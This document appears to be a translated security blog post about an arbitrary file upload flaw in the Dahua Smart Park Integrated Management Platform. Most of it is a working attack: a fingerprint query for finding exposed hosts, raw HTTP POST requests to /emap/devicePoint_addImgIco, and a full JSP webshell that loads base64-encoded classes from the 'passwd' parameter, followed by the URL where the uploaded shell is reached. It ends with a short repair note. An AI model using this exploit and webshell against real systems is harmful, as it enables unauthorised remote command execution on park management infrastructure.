Dahua Smart Park Integrated Management Platform RCE Vulnerability Reappearance (0day)

0x01 Product Introduction

      "Dahua Smart Park Integrated Management Platform" is a comprehensive management platform with functions such as park operation, resource allocation, and intelligent services. The platform is intended to assist in optimizing the resource allocation of the park to meet diversified management needs, and at the same time enhance the user experience by providing intelligent services.

0x02 Vulnerability Overview

     The Dahua Smart Park device has opened the file upload function, but it has not strictly restricted and filtered the uploaded file type, size, format, path, etc., allowing attackers to construct malicious files and upload them to the device, and then use this The vulnerability gains privileges and executes arbitrary commands.

0x03 Recurrence environment

Intergraph fingerprint: web.body="/WPMS/asset/lib/gridster/"

 0x04 Vulnerability Reappearance

 In the above situation, there is a loophole

 PoC

POST /emap/devicePoint_addImgIco?hasSubsystem=true HTTP/1.1
Host: your-ip
Content-Type: multipart/form-data; boundary=A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0

--A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT
Content-Disposition: form-data; name="upload"; filename="a.jsp"
Content-Type: application/octet-stream
Content-Transfer-Encoding: binary

test123
--A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT--

try to upload 

verify url

http://ip:8314/upload/emap/society_new/回显的jsp文件名

PS: After the file is uploaded, the port here is redirected to port 8314 

 upload

POST /emap/devicePoint_addImgIco?hasSubsystem=true HTTP/1.1
Host: your-ip
Content-Type: multipart/form-data; boundary=A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0

--A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT
Content-Disposition: form-data; name="upload"; filename="b.jsp"
Content-Type: application/octet-stream
Content-Transfer-Encoding: binary

<%!
    class U extends ClassLoader {
        U(ClassLoader c) {
            super(c);
        }
        public Class g(byte[] b) {
            return super.defineClass(b, 0, b.length);
        }
    }
 
    public byte[] base64Decode(String str) throws Exception {
        try {
            Class clazz = Class.forName("sun.misc.BASE64Decoder");
            return (byte[]) clazz.getMethod("decodeBuffer", String.class).invoke(clazz.newInstance(), str);
        } catch (Exception e) {
            Class clazz = Class.forName("java.util.Base64");
            Object decoder = clazz.getMethod("getDecoder").invoke(null);
            return (byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, str);
        }
    }
%>
<%
    String cls = request.getParameter("passwd");
    if (cls != null) {
        new U(this.getClass().getClassLoader()).g(base64Decode(cls)).newInstance().equals(pageContext);
    }
%>
--A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT--

 try to connect

 0x05 Repair suggestion

     It is recommended that users who use relevant systems apply patches as soon as possible, and at the same time restrict access sources, and try to avoid exposing the comprehensive management platform of Dahua Smart Park to the public network or insecure network environment.